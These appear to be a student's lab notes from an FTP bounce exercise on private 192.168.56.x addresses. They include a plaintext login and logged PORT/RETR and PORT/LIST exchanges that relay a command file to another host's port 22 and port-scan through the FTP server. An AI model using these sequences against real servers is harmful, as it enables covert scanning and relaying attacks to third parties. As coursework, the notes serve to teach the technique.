USER student
PASS golyeeHug6

############################################
# DNS BOUNCE TO COMMAND ANOTHER FTP SERVER #
############################################

# SERVER NOT THERE
Client:   PORT 192,168,56,101,0,2
  Server: 200 PORT command successful
Client:   RETR instrs
  Server: 425 Unable to build data connection: Connection refused

# RAN COMMANDS ON SERVER
Client:   PORT 192,168,56,101,0,22
  Server: 200 PORT command successful
Client:   RETR instrs
  Server: 150 Opening ASCII mode data connection for instrs (2033 bytes)
  Server: 226 Transfer complete

###########################
# DNS BOUNCE TO PORT SCAN #
###########################

# PORT NOT OPEN
Client:   PORT 192,168,56,1,0,63
  Server: 200 PORT command successful
Client:   LIST
  Server: 425 Unable to build data connection: Connection refused
  Server: 450 LIST: Connection refused

# PORT OPEN BUT NO CONNECTIONS AVAILABLE
Client:   PORT 192,168,56,101,0,21
  Server: 200 PORT command successful
Client:   LIST
  Server: 425 Unable to build data connection: Cannot assign requested address
  Server: 450 LIST: Cannot assign requested address

# PORT OPEN AND CONNECTIONS AVAILABLE
Client:   PORT 192,168,56,101,0,21
  Server: 200 PORT command successful
Client:   LIST
  Server: 150 Opening ASCII mode data connection for file list
  Server: 226 Transfer complete
